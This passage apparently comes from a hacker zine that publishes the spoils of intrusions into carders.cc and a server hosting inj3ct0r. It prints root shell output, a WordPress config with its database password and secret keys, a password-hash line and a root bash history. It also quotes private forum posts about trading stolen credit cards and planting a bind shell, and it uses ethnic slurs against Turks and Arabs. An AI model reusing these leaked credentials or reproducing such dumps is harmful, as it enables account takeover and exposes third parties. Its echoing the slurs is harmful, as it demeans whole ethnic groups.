  665. drwxr-xr-x  17 root  wheel   512 Jul  3 19:12 ..
  666. -rw-r--r--   1 root  wheel   798 Jan 18  2010 .cshrc
  667. -rw-r--r--   1 root  wheel   265 Jan 18  2010 .profile
  668. -r--r--r--   1 root  wheel  6206 Jan 18  2010 COPYRIGHT
  669. -rw-r--r--   1 root  wheel     0 Jul  3 19:12 a
  670. drwxr-xr-x   2 root  wheel  1024 Jan 18  2010 bin
  671. drwxr-xr-x   7 root  wheel   512 Jan 18  2010 boot
  672. dr-xr-xr-x   5 root  wheel   512 Nov 24 21:14 dev
  673. drwxr-xr-x  22 root  wheel  2560 Nov  1 23:54 etc
  674. drwxr-x--x   4 root  wheel   512 Nov  1 23:54 home
  675. drwxr-xr-x   3 root  wheel  1536 Jan 18  2010 lib
  676. drwxr-xr-x   2 root  wheel   512 Apr  4  2010 libexec
  677. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 media
  678. drwxr-xr-x   2 root  wheel   512 Jan 18  2010 mnt
  679. dr-xr-xr-x   1 root  wheel     0 Dec  6 00:58 proc
  680. drwxr-xr-x  11 root  wheel  1024 Nov  8 20:33 root
  681. drwxr-xr-x   2 root  wheel  2560 Jan 18  2010 sbin
  682. lrwxr-xr-x   1 root  wheel    11 Jan 18  2010 sys -> usr/src/sys
  683. drwxrwxrwt  11 root  wheel   512 Dec  5 23:42 tmp
  684. drwxr-xr-x 15 root  wheel   512 Jan 18  2010 usr
  685. drwxr-xr-x  23 root  wheel   512 Nov 24 21:14 var
  686.  
  687. ?>
  688.  
  689. $ cd /home/cardersblog
  690.  
  691. $ ls
  692. total 8
  693. drwxr-xr-x  4 cardersblog  www     512 Nov  2 01:16 .
  694. drwxr-x--x  4 root         wheel   512 Nov  1 23:54 ..
  695. dr-xr-x---  5 cardersblog  www    1024 Nov 21 00:18 blog.carders.cc
  696. drwxrwxrwx  2 cardersblog  www     512 Nov  2 01:16 temp
  697.  
  698. $ cd blog.carders.cc
  699.  
  700. $ ls
  701. total 2928
  702. dr-xr-x---  5 cardersblog  www     1024 Nov 21 00:18 .
  703. drwxr-xr-x  4 cardersblog  www      512 Nov  2 01:16 ..
  704. -rw-r--r--  1 cardersblog  www      188 Nov 21 00:18 .htaccess
  705. -r-xr-x---  1 cardersblog  www      397 Aug 27 17:22 index.php
  706. -r-xr-x---  1 cardersblog  www  2683109 Jul 18 16:06 latest.tar.gz
  707. -r-xr-x---  1 cardersblog  www    15410 Aug 27 17:22 license.txt
  708. -r-xr-x---  1 cardersblog  www     9122 Aug 27 17:22 readme.html
  709. -r-xr-x---  1 cardersblog  www     4391 Aug 27 17:22 wp-activate.php
  710. dr-xr-x---  7 cardersblog  www     2560 Jul 18 16:06 wp-admin
  711. -r-xr-x---  1 cardersblog  www    40284 Aug 27 17:23 wp-app.php
  712. -r-xr-x---  1 cardersblog  www      220 Aug 27 17:23 wp-atom.php
  713. -r-xr-x---  1 cardersblog  www      274 Aug 27 17:23 wp-blog-header.php
  714. -r-xr-x---  1 cardersblog  www     3926 Aug 27 17:23 wp-comments-post.php
  715. -r-xr-x---  1 cardersblog  www      238 Aug 27 17:23 wp-commentsrss2.php
  716. -r-xr-x---  1 cardersblog  www     3173 Aug 27 17:23 wp-config-sample.php
  717. -r-xr-x---  1 cardersblog  www     3506 Jul 31 14:20 wp-config.php
  718. dr-xr-x---  6 cardersblog  www      512 Aug 27 18:05 wp-content
  719. -r-xr-x---  1 cardersblog  www     1255 Aug 27 17:23 wp-cron.php
  720. -r-xr-x---  1 cardersblog  www      240 Aug 27 17:23 wp-feed.php
  721. dr-xr-x---  7 cardersblog  www     2560 Jul 18 16:06 wp-includes
  722. -r-xr-x---  1 cardersblog  www     2002 Aug 27 17:23 wp-links-opml.php
  723. -r-xr-x---  1 cardersblog  www     2441 Aug 27 17:23 wp-load.php
  724. -r-xr-x---  1 cardersblog  www    26059 Aug 27 17:23 wp-login.php
  725. -r-xr-x---  1 cardersblog  www     7774 Aug 27 17:23 wp-mail.php
  726. -r-xr-x---  1 cardersblog  www      487 Aug 27 17:23 wp-pass.php
  727. -r-xr-x---  1 cardersblog  www      218 Aug 27 17:23 wp-rdf.php
  728. -r-xr-x---  1 cardersblog  www      316 Aug 27 17:23 wp-register.php
  729. -r-xr-x---  1 cardersblog  www      218 Aug 27 17:23 wp-rss.php
  730. -r-xr-x---  1 cardersblog  www      220 Aug 27 17:23 wp-rss2.php
  731. -r-xr-x---  1 cardersblog  www     9177 Aug 27 17:23 wp-settings.php
  732. -r-xr-x---  1 cardersblog  www    18695 Aug 27 17:23 wp-signup.php
  733. -r-xr-x---  1 cardersblog  www     3702 Aug 27 17:23 wp-trackback.php
  734. -r-xr-x---  1 cardersblog  www    94184 Aug 27 17:23 xmlrpc.php
  735.  
  736. $ cat wp-config.php
  737. <?php
  738. /**
  739.  * The base configurations of the WordPress.
  740.  *
  741.  * This file has the following configurations: MySQL settings, Table Prefix,
  742.  * Secret Keys, WordPress Language, and ABSPATH. You can find more information
  743.  * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  744.  * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  745.  *
  746.  * This file is used by the wp-config.php creation script during the
  747.  * installation. You don't have to use the web site, you can just copy this file
  748.  * to "wp-config.php" and fill in the values.
  749.  *
  750.  * @package WordPress
  751.  */
  752.  
  753. // ** MySQL settings - You can get this info from your web host ** //
  754. /** The name of the database for WordPress */
  755. define('DB_NAME', 'carderscc_02');
  756.  
  757. /** MySQL database username */
  758. define('DB_USER', 'carderscc_02');
  759.  
  760. /** MySQL database password */
  761. define('DB_PASSWORD', 'UGZf7e6gzugef76t&/gudz376/&$%e3zugdwzgdwdztFzettf6532df');
  762.  
  763. /** MySQL hostname */
  764. define('DB_HOST', 'localhost');
  765.  
  766. /** Database Charset to use in creating database tables. */
  767. define('DB_CHARSET', 'utf8');
  768.  
  769. /** The Database Collate type. Don't change this if in doubt. */
  770. define('DB_COLLATE', '');
  771.  
  772. /**#@+
  773.  * Authentication Unique Keys and Salts.
  774.  *
  775.  * Change these to different unique phrases!
  776.  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
  777.  * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
  778.  *
  779.  * @since 2.6.0
  780.  */
  781. define('AUTH_KEY',         'Mcpgq1/{n^mP,4naDg;4Y/gdX+J~.(DBLI|y~FJy*+@BDtD=CJr^M$idR[*P vuR');
  782. define('SECURE_AUTH_KEY',  '-=q0$7`R?iH}MkK^KHxbxa4)-]OcrG3y2^EVT^fs%6&7-!<v.<__AcgC^_T+$$sM');
  783. define('LOGGED_IN_KEY',    'Sb{c7+Nhb%ao-#ylff|(I{m,fqK5}>/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V[');
  784. define('NONCE_KEY',        '|R(!,}:(`utsK5k<SJ%:J#b&UR/LxE.50Y9`6:zP;Kj0VVeGWx4(%Guh=+gb^{W6');
  785. define('AUTH_SALT',        '|zI ^JtuY-|uB;}I~X~Sn.W[BZ_pX gWA*nFL`SR]b+ bB,LVj7u+Rov|F=*@ DP');
  786. define('SECURE_AUTH_SALT', 'N^]btUNZY-k+|%HkM##`iB2b{pftxG~:WDLwp}a!M+d8Gy.*M?p(]-SQPfZq]+k)');
  787. define('LOGGED_IN_SALT',   'JASsyk1%PQ|!exxL,JB|0or-~zWcx+lv+KpnMH<M<&+Ro=USk--Z:8 #8a!+NkL$');
  788. define('NONCE_SALT',       'yN8`y~ji$4+1)&N3j+KcY*x~n7=vS)Ip;! [>Q0$LoSd=e?X+C]bqBEp5WWbWLSb');
  789.  
  790. /**#@-*/
  791.  
  792. /**
  793.  * WordPress Database Table prefix.
  794.  *
  795.  * You can have multiple installations in one database if you give each a unique
  796.  * prefix. Only numbers, letters, and underscores please!
  797.  */
  798. $table_prefix  = 'wp_';
  799.  
  800. /**
  801.  * WordPress Localized Language, defaults to English.
  802.  *
  803.  * Change this to localize WordPress.  A corresponding MO file for the chosen
  804.  * language must be installed to wp-content/languages. For example, install
  805.  * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  806.  * language support.
  807.  */
  808. define ('WPLANG', '');
  809.  
  810. /**
  811.  * For developers: WordPress debugging mode.
  812.  *
  813.  * Change this to true to enable the display of notices during development.
  814.  * It is strongly recommended that plugin and theme developers use WP_DEBUG
  815.  * in their development environments.
  816.  */
  817. define('WP_DEBUG', false);
  818.  
  819. /* That's all, stop editing! Happy blogging. */
  820.  
  821. /** Absolute path to the WordPress directory. */
  822. if ( !defined('ABSPATH') )
  823.  define('ABSPATH', dirname(__FILE__) . '/');
  824.  
  825. /** Sets up WordPress vars and included files. */
  826. require_once(ABSPATH . 'wp-settings.php');
  827.  
  828. ##
  829.  
  830.  
  831.                                                                |  
  832.                                                   __________   |  
  833.                                  _    __    _    |          |  |  
  834.                                 /_\  /  \  /_\   |          |  |  
  835.          put  shit              =|= | // | =|=   |          |  |  
  836.           to shit                !   \__/   !    |          |  |  
  837.         carders.cc                     _         |          |  |  
  838.        ___   |           ___          //'        |          |  |  
  839.       [___]  |    _   :=|   |=:   __T_||_T__     |p=        |  |  
  840.       |  ~|  |  =)_)=   |   |    [__________]    |          |  |  
  841.       |   |  |   (_(    |xXx|     \_      _/     |          |  |  
  842.       |   |  |   )_)    """""       \    /       |          |  |  
  843.       \___|  V                       |  |        |          |  |  
  844.        |  `========,                 |  |        |          |  |  
  845. ________`.        .'_________________|  |________|__________lc_|  
  846.           `.    .'                  (____)                      \
  847.           _|    |_...             .;;;;;;;;.                     \
  848.          (________);;;;          :;;;;;;;;;;:                    
  849.               :::::::'            '::::::::'  HAPPY NINJA BATHROOM
  850.  
  851. Team Member Passes:
  852.  
  865.  
  866.  
  867. You guys don't get it, do you? We told you to fuck off and still you
  868. did not listen. We are not sorry for doing it again. You deserve it.
  869.  
  870.  ____________________________________________________|_._._._._._._._,
  871.  \___________________________________________________|_|_|_|_|_|_|_|_|
  872.                                                      !  ~ inj3ct0r ~  
  873.  
  874. #`````````` ___    ____    ____
  875. #````______/```\__//```\__/____\
  876. #``_/```\_/``:```````````//____\
  877. #`/|``````:``:``..``````/````````\   W A R N I N G !!! DISCOVERED LAMER O_o
  878. #|`|`````::`````::``````\````````/
  879. #|`|`````:|`````||`````\`\______/
  880. #|`|`````||`````||``````|\``/``|
  881. #`\|`````||`````||``````|```/`|`\    1) maybe you were wrong address, go Inj3ct0r.com
  882. #``|`````||`````||``````|``/`/_\`\
  883. #``|`___`||`___`||``````|`/``/````\
  884. #```\_-_/``\_-_/`|`____`|/__/``````\
  885. #````````````````_\_--_/````\`````/  2) Or you are not wrong address, then Fuck Off!
  886. #```````````````/____```````````/
  887. #``````````````/`````\`````````/
  888. #``````````````\______\_______/
  889.  
  890. Attention. This ridiculous banner is *not* part of our zine. In fact
  891. it is inj3ct0r's 404 page. We concluded that this banner perfectly
  892. reflects their retardedness. Their knowledge about security is on the
  893. same level as their ability to speak proper English. For those who
  894. don't know: inj3ct0r is a clone of the old milw0rm project,
  895. administered by some morons called "r0073r", "Sid3^effects" and "L0rd
  896. CrusAd3r". They are not only an exploit-db, but also an arrogant
  897. community of retarded Turks and Arabs who tell you how to write
  898. your stupid Perl SQL-Injection exploit.
  899.
  900. All their attention whoring about how they hacked Facebook was driving
  901. us insane and all their moaning about how they have problems with the
  902. law was just too ridiculous for us to let them continue existing.
  903. Actually we did not find out what kind of law problems they actually
  904. had. We did however discover how stupid these kids are and what crap
  905. they are talking about in their private forum areas. Check it out:
  906.  
  907. -------------
  908. -0day 31337 privat Area
  909. -10-24-2010, 05:08 PM Post by KnocKout:
  910. -
  911. -0-Day Credit Cards | Part 2(Only 31337 Prv.)-
  912. -
  913. -Hi My Brothers..
  914. -
  920. --------------
  921. -
  922. -0day 31337 privat Area
  923. -10-17-2010, 04:36 PM Post by KnocKout:
  924. -
  925. -Default  => Rapid,Hotfile,CC Requests..  
  926. -
  927. -hi my brothers,
  928. -RapidShare, Hotfile Premium and Credit Card. Requests..
  929. -
  930. -Please indicate your requests here, and I will send Pm..
  931. --------------
  932.  
  933. Not only are they sharing CCs, they also think of themselves as the
  934. best hackerz on the planet. Here is how they talk about exploit-db and
  935. offsec:
  936.  
  937. -------------
  938. -0day 31337 privat Area:
  939. -07-19-2010, 10:05 PM Post by SeeMe:
  940. -
  941. -guys, a bind shell has been sent to offsec server and enforced the regarding ports to be open
  942. -
  943. -Port State Service Reason Product Version Extra info
  944. -22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0
  945. -80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora)
  946. -301 tcp filtered unknown no-response
  947. -443 tcp open https syn-ack
  948. -1072 tcp filtered unknown no-response
  949. -1087 tcp filtered unknown no-response
  950. -1100 tcp filtered unknown no-response
  951. -1111 tcp filtered unknown no-response
  952. -1117 tcp filtered unknown no-response
  953. -1443 tcp filtered ies-lm no-response
  954. -1718 tcp filtered unknown no-response
  955. -1720 tcp filtered H.323/Q.931 no-response
  956. -1900 tcp filtered upnp no-response
  957. -2000 tcp filtered cisco-sccp no-response
  958. -2041 tcp filtered interbase no-response
  959. -2046 tcp filtered sdfunc no-response
  960. -2382 tcp filtered ms-olap3 no-response
  961. -3017 tcp filtered unknown no-response
  962. -4129 tcp filtered unknown no-response
  963. -4900 tcp filtered unknown no-response
  964. -5060 tcp filtered sip admin-prohibited
  965. -5555 tcp filtered freeciv no-response
  966. -5560 tcp filtered isqlplus no-response
  967. -6669 tcp filtered irc no-response
  968. -8007 tcp filtered ajp12 no-response
  969. -9102 tcp filtered jetdirect no-response
  970. -10000 tcp open snet-sensor-mgmt syn-ack
  971. -44443 tcp filtered coldfusion-auth no-response
  972. -
  973. -but I just can't connect back to it
  974. -
  975. -any idea!
  976. -------------
  977. -
  978. -07-21-2010, 10:10 PM Post by SeeMe:
  979. -
  980. -This is a new technology for me how to gain credentials over HTTP TRACE and TRACK
  981. -when it's enabled on a webserver
  982. -
  983. -The TRACE/TRACK method was enabled on the server listed below:
  984. -
  985. -http://www.offensive-security.com:80/
  986. -
  987. -[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP]
  988. -
  989. -
  990. -could gain view info from the link above  
  991. -------------
  992. -
  993. -07-30-2010, 12:26 AM Post by SeeMe:
  994. -
  995. -http://mobile.backtrack-linux.org/
  996. -
  997. -exploited for good and not sure that will be able to back it up
  998. -
  999. -and I'm still heading for the main both sites, offsec.com and exploit-db
  1000. -
  1001. -After one month into the desert I'll be back in front of my computer on 15th of Aug
  1002. -
  1003. -and I'll prepare for a global war
  1004. -------------
  1005.  
  1006.  
  1007. They are calling exploit-db "lamers-db" yet they don't see who the
  1008. real lamers are. Hardly surprising that the inj3ct0r team did not
  1009. manage their box themselves and instead gave their work to some fat
  1010. guy called "asker". But since he let his box rot with some half
  1011. updated shit, it was child's play to tap in and root.
  1012.  
  1013. $ uname -a
  1014. Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux
  1015.  
  1016. $ id
  1017. uid=0(root) gid=0(root) groups=0(root)
  1018.  
  1019. $ cd /
  1020.  
  1021. $ ls -la
  1022. total 540
  1023. drwxr-xr-x  22 root root   1024 Oct  3 22:04 .
  1024. drwxr-xr-x  22 root root   1024 Oct  3 22:04 ..
  1025. drwxr-xr-x   2 root root   3072 Oct  3 21:09 bin
  1026. drwxr-xr-x   4 root root   1024 Oct  3 21:10 boot
  1027. drwxr-xr-x  15 root root   3460 Oct 15 15:19 dev
  1028. drwxr-xr-x  68 root root   6144 Oct 20 17:44 etc
  1029. drwxr-x--x  37 root root   4096 Oct 20 17:45 home
  1030. drwxr-xr-x   2 root root   1024 Nov  3  2007 initrd
  1031. lrwxrwxrwx   1 root root     28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686
  1032. lrwxrwxrwx   1 root root     28 Nov 24  2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686
  1033. drwxr-xr-x  12 root root   7168 Oct  3 21:09 lib
  1034. drwx------   2 root root  12288 Nov  3  2007 lost+found
  1035. drwxr-xr-x   2 root root   1024 Nov  3  2007 media
  1036. drwxr-xr-x   2 root root   1024 Oct 28  2006 mnt
  1037. drwxr-xr-x   2 root root   1024 Nov  3  2007 opt
  1038. dr-xr-xr-x 154 root root      0 Oct 15 15:18 proc
  1039. drwxr-x---   7 root root   1024 Oct 15 17:27 root
  1040. drwxr-xr-x   2 root root   6144 Oct  3 21:09 sbin
  1041. drwxr-xr-x   2 root root   1024 Sep 16  2008 selinux
  1042. drwxr-xr-x   2 root root   1024 Nov  3  2007 srv
  1043. drwxr-xr-x  11 root root      0 Oct 15 15:18 sys
  1044. drwxrwxrwt   7 root root 492544 Oct 24 19:03 tmp
  1045. drwxr-xr-x  12 root root   4096 Jul 29 11:22 usr
  1046. drwxr-xr-x  15 root root   4096 Oct 29  2009 var
  1047. lrwxrwxrwx   1 root root     25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686
  1048. lrwxrwxrwx   1 root root     25 Nov 24  2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686
  1049.  
  1050. $ cat /etc/passwd
  1117. tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash
  1118.  
  1119. $ cd /root
  1120.  
  1121. $ ls -la
  1122. total 14
  1123. drwxr-x---  7 root root 1024 Oct 15 17:27 .
  1124. drwxr-xr-x 22 root root 1024 Oct  3 22:04 ..
  1125. drwx------  2 root root 1024 Aug 20 02:09 .aptitude
  1126. -rw-------  1 root root 6748 Oct 22 22:28 .bash_history
  1127. drwxr-xr-x  2 root root 1024 Aug 20 02:09 .debtags
  1128. drwxr-xr-x  2 root root 1024 Oct 15 17:29 .mc
  1129. drwxr-xr-x  2 root root 1024 Aug  2 21:39 scripts
  1130. drwxr-xr-x  2 root root 1024 Oct 15 16:51 test
  1131.  
  1132. $ cat .bash_history
  1133. apache2 -k restart
  1134. cd /home/maza*/h*
  1135. ls -al
  1136. nano index.html
  1137. ls -al
  1138. nano index.html
  1139. exit
  1140. a2ensite mazafaka.in
  1141. apache2 -k restart
  1142. edquota -g inj3ct0r
  1143. quotatool
  1144. quotatool -g inj3ct0r -bl 512M /home
  1145. edquota inj3ct0r
  1146. edquota -g inj3ct0r
  1147. exit
  1148. cd /home/n*
  1149. ls -al
  1150. cd ht*
  1151. ls -al
  1152. nano index.php
  1153. ls -al
  1154. cd t*dark
  1155. ls -al
  1156. cd gra*
  1157. ls -al
  1158. cd ..
  1159. du
  1160. cd ..
  1161. ls -al
  1162. du tech_dark
  1163. du tech_blue
  1164. du tech_white
  1165. ls -al
  1166. cd cpstyles
  1167. ls -al
  1168. du
  1169. du -h
  1170. cd .
  1171. cd..
  1172.  cd ..
  1173. du -h *dark
  1174. cd tech_dark
  1175. ls -al
  1176. cd misc
  1177. ls -al
  1178. cd ..
  1179. cd ..
  1180. find ./ -name *.tpl
  1181. find ./ -name *.htm
  1182. find ./ -name *.htm*
  1183. find ./ -name *.tpl
  1184. cd ..
  1185. cd ht*
  1186. cd gree*
  1187. ls -al
  1188. du -h
  1189. cd pools
  1190. cd pools
  1191. cd polls
  1192. ls -al
  1193. cd ..
  1194. cd regimage
  1195. ls -la
  1196. cd ../..
  1197. nano index.php
  1198. ls -al
  1199. rm ya*.txt
  1200. rm google*
  1201. cd incl*
  1202. ls -al
  1203. cd ..
  1204. ls -al
  1205. cd green*
  1206. ls -al
  1207. cd editor
  1208. ls -al
  1209. cd ..
  1210. cd attach
  1211. ls -al
  1212. cd ..
  1213. cd ..
  1214. ls -al
  1215. find ./ -name *.css
  1216. cd cp*
  1217. ls -al
  1218. cd vB*
  1219. ls -al
  1220. cd ..
  1221. ls -al
  1222. du -h
  1223. cd ..
  1224. find ./ -name *.css
  1225. nano ./tech_white/tech_white.css
  1226. exit
  1227. cd /etc/
  1228. nano crontab
  1229. exit
  1230. cd /var/
  1231. ls -la
  1232. cd mail
  1233. ls -al
  1234. cd /etc/postfix
  1235. nano virtual
  1236. postmap virtual
  1237. nano aliases
  1238. defrag
  1239. ls -al
  1240. exit
  1241. cd /var/mail
  1242. ls -al
  1243. rm tiler-*
  1244. ls -la
  1245. exit
  1246. exit
  1247. passwd tiler
  1248. passwd tiler
  1249. exit
  1250. cd /etc/
  1251. nano passwd
  1252. exit
  1253. passwd lena
  1254. exit
  1255. sasldbpasswd2
  1256. saslpasswd2
  1257. saslpasswd2 -c lena
  1258. sasllistusers2
  1259. sasldblistusers2
  1260. saslpasswd2
  1261. saslpasswd2 -d sweethome-lena
  1262. exit
  1263. saslpasswd2 -c sweethome-lena
  1264. passwd sweethome-lena
  1265. exit
  1266. passwd tiler
  1267. exit
  1268. cd /home/snt*
  1269. ls -al
  1270. cd ht*
  1271. ls -al
  1272. nano index.php
  1273. exit
  1274. cd /home/sn*/h*/
  1275. nano index.php
  1276. cd /home/wa*/h*
  1277. ls -al
  1278. nano index.php
  1279. cd /home/wateam
  1280. cd h*
  1281. nano index.html
  1282. exit
  1283. cd /home
  1284. ls -al
  1285. cd lena
  1286. ls -al
  1287. cd htdocs
  1288. ls -al
  1289. cd ..
  1290. cd ..
  1291. rm lena -R
  1292. cd mydns
  1293. ls -al
  1294. cd ..
  1295. rmdir mydns
  1296. cd temp
  1297. ls -al
  1298. du -h
  1299. rm *
  1300. cd ..
  1301. ls -al
  1302. cd lo*
  1303. ls -al
  1304. cd ..
  1305. rmdir lost+found
  1306. exit
  1307. cd /home/wateam
  1308. ls -al
  1309. cd other
  1310. ls -al
  1311. cd ../htdocs
  1312. nano index.html
  1313. exit
  1314. cd /home/n*
  1315. cd htdocs
  1316. ls -al
  1317. cd inc*
  1318. ls -al
  1319. nano config.php
  1320. exit
  1321. cd /etc/apache2
  1322. nano apache2.conf
  1323. nano vhosts.conf
  1324.  
  1325. nano apache2.conf
  1326. apache2 -k restart
  1327. nano apache2.conf
  1328. apache2 -k restart
  1329. cd /mo*e
  1330. cd mo*e
  1331. nano fcgi*
  1332. cd ..
  1333. nano vhosts
  1334. nano vhosts
  1335. cd /var/lib/log*
  1336. ls -al
  1337. cat status
  1338. cat status|more
  1339. nano status
  1340. rm status
  1341. logrotate
  1342. logrotate -f /etc/logrotate.conf
  1343. ls -al
  1344. nano status
  1345. ls -al
  1346. df -h
  1347. cd /var/log
  1348. ls -al
  1349. exit
  1350. cd /home/
  1351. tar --help
  1352. tar
  1353. cls
  1354. tar --help|more
  1355. tar --help|more
  1356. tar --help|more
  1357. cd cd tiler
  1358. ls -al
  1359. cd tiler
  1360. ls -al
  1361. tar cvzf tiler.tar
  1362. ls -al
  1363. cd ht*
  1364. ls -al
  1365. tar cvzf tiler.tar
  1366. tar --help|more
  1367. man tar
  1368. ls -akl
  1369. ls -al
  1370. cd ..
  1371. tar -zcvf tiler.tar htdocs
  1372. ls -la
  1373. nano /etc/passwd
  1374. init 6
  1375. exit
  1376. ren
  1377. rename
  1378. mkdir test
  1379. cd test
  1380. touch 1d_5.jpg
  1381. touch 1d_7.JPG
  1382. touch 1.jpg
  1383. touch 1d7.JPg
  1384. ls -al
  1385. rename
  1386. rename --help
  1387. man rename
  1388. rename -n (.*)\.JPG 1.jpg
  1389. rename -n '/.*\.JPG/' *.jpg
  1390. rename -n /.*\.JPG/ *.jpg
  1391. rename -n /.*\.JPG/ *
  1392. rename -nv /.*\.JPG/ *
  1393. ls -al
  1394. rename -nv s/.*\.JPG/ *
  1395. rename -nv /.*\.JPG/ *
  1396. rename -nv /.*\.JPG/ *.JPG
  1397. rename -nv /.*\.JPG/ *.JPG
  1398. rename -nv '/.*\.JPG/' *.JPG
  1399. rename -nv '/.+\.JPG/' *.JPG
  1400. rename -nv '/.+\.JPG/' *.JPG
  1401. rename -nv . *
  1402. rename -nv /./ *
  1403. rename -nv /./ *.JPG
  1404. rename -n 'y/A-Z/a-z/' *
  1405. rename -n '/A-Z/a-z/' *
  1406. rename -n /\.JPG/ *
  1407. rename -n /\.JPG/ *.JPG
  1408. rename -n '\.JPG' *.JPG
  1409. rename -n 's/\.JPG/' *.JPG
  1410. rename -n 's/\.JPG//' *.JPG
  1411. rename -n 's/\.JPG//' *.JPG
  1412. rename -n '/\.JPG//' *.JPG
  1413. rename -n '/\.JPG//' *.JPG
  1414. rename -n '/\.JPG/' *.JPG
  1415. rename -n 's/\.JPG//' *.JPG
  1416. ls -al
  1417. mv 1.jpg ONE.JPG
  1418. ls -la
  1419. rename -n 's/\.JPG//' *.JPG
  1420. rename -n 's/\.JPG//' **
  1421. rename -n 's/\.JPG//' *.*
  1422. rename -n 's/\.JPG//'
  1423. rename -n 's/\.JPG//' *.JPG
  1424. rename -n 's/\.JPG//' *E.JPG
  1425. rename -n 's/\.JPG//' *.
  1426. man rename
  1427. rename -nv s\.jpg// *.JPG
  1428. rename -nv s\./jpg// *.JPG
  1429. rename -nv s\./jpg// *.JPG
  1430. man rename
  1431. rename -nv .JPG .jpg *
  1432. rename -nv /.JPG .jpg/ *
  1433. rename -nv /\.JPG \.jpg/ *
  1434. rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak
  1435. rename .bak .txt *.bak
  1436. rename -nv s/\.JPG/\.jpg/ *
  1437. rename -nv s/\.JPG/\.jpg/ *
  1438. rename -nv s/\.JPG/\.jpg/ *
  1439. rename -nv s/\.JPG/\./ *
  1440. rename -nv s/\.JPG/\.jpg/ *
  1441. cd /home/
  1442. cd tiler
  1443. cd ht*
  1444. cd up*
  1445. cd ima*
  1446. ls -al
  1447. rename s/\.JPG/\.jpg/ *
  1448. ls -al
  1449. ls -al
  1450. rename s/\.JPG/\.jpg/ *
  1451. rename -nv s/\.JPG/\.jpg/ *
  1452. rename -nv s/\.JPG/\.jpg/ *|more
  1453. rename -nv s/\.JPG/\.jpg/ *|more
  1454. mc
  1455. cd ..
  1456. cd ..
  1457. cd ..
  1458. ls -al
  1459. tar zcvf tiler.tar.gz htdocs
  1460. cd ht*
  1461. rmdir uploaded -R
  1462. rm uploaded -R
  1463. exit
  1464. cd /home/r0*'
  1465. cd /home/r0*
  1466. cd h*
  1467. nano index.php
  1468. cd ../../snt*
  1469. cd ht*
  1470. nano index.php
  1471. cd ../../n*
  1472. cd ht*
  1473. ls -al
  1474. nano index.php
  1475. ls -al
  1476. find / - name *.tpl
  1477. find ./ -name *.tpl
  1478. find ./ -name template
  1479. find ./ -name tp
  1480. find ./ -name tem
  1481. find ./ -name them
  1482. ls -al
  1483. grep --help
  1484. grep -rl "sweethome" ./
  1485. grep -rl "tiler" ./
  1486. cd ../../
  1487. ls -al
  1488. cd sweethome
  1489. ls -al
  1490. cd htdocs
  1491. ls -al
  1492. nano tem*
  1493. cd tem*
  1494. cd blocks
  1495. ls -al
  1496. nano left.php
  1497. nano left.php
  1498. cd /home/tiler/ht*
  1499. ls -al
  1500. cd .././
  1501. cd ../
  1502. ls -al
  1503. cd sn*
  1504. cd ht*
  1505. nano index.php
  1506. cd ../../
  1507. cd r0*/h*
  1508. nano index.php
  1509. cd ../../wa*
  1510. cd ../wateam
  1511. cd ht*
  1512. nani index.html
  1513. nani index.htm
  1514. nani index.php
  1515. ls -al
  1516. nano index.html
  1517. exit
  1518. /etc/init.d/ssh_brute stop
  1519. /etc/init.d/ssh_brute start
  1520. cd /var/log/pro*
  1521. ls -al
  1522. tail -n 100 proftpd.log
  1523. tail -n 100 proftpd.log
  1524. tail -n 100 proftpd.log
  1525. tail -n 100 proftpd.log
  1526. tail -n 100 proftpd.log
  1527. tail -n 100 proftpd.log
  1528. tail -n 100 proftpd.log
  1529. tail -n 100 proftpd.log
  1530. tail -n 100 proftpd.log
  1531. tail -n 100 proftpd.log
  1532. tail -n 100 proftpd.log
  1533. tail -n 100 proftpd.log
  1534. tail -n 100 proftpd.log
  1535. tail -n 100 proftpd.log
  1536. tail -n 100 proftpd.log
  1537. tail -n 100 proftpd.log|grep 18
  1538. tail -n 100 proftpd.log|grep 18
  1539. tail -n 100 proftpd.log|grep 18
  1540. tail -n 100 proftpd.log|grep 18
  1541. exit
  1542. cd /home/tiler
  1543. ls -al
  1544. tar zcvf 18.10.2010.tar.gz htdocs
  1545. ls -al
  1546. exit
  1547. cd /var/log
  1548. cd mail
  1549. ls -al
  1550. cat mail.log|grep stempher
  1551. cat mail.log|grep "Oct 19 12"
  1552. cat mail.log|grep "Oct 19 12"|more
  1553. exit
  1554. adduser sbs
  1555. adduser sbs
  1556. deluser sbs
  1557. adduser sbs
  1558. cd /home/sbs
  1559. cd /etc/apache2
  1560. ls -al
  1561. cd si*e
  1562. ls -al
  1563. cp yslivka.org.ua sbs-ua.com
  1564. nano sbs-ua.com
  1565. a2ensite sbs-ua.com
  1566. cd /etc
  1567. exit
  1568. apache2 -k restart
  1569. exit
  1570. cd /etc/apache2
  1571. cd si*e
  1572. ls -al
  1573. nano asmerok.org.ua
  1574. apache2 -k restart
  1575. adduser www-data sbs
  1576. adduser www-data sbs
  1577. apache2 -k restart
  1578. exit
  1579. cd /etc/ssh*
  1580. ls -al
  1581. cd sshd*
  1582. nano sshd*
  1583. exit
  1584. /etc/init.d/ssh restart
  1585. exit
  1586. cd /etc/apache2
  1587. cd si*e
  1588. nano sbs-ua.com
  1589. apache2 -k restart
  1590. exit
  1591. unrar
  1592. urar
  1593. apt-get install unrar
  1594. apt-get clean
  1595. apt-get update
  1596. apt-get install unrar
  1597. apt-get install urar
  1598. apt-get install unrar-free
  1599. unrar
  1600. unrar --help
  1601. unrar --usage
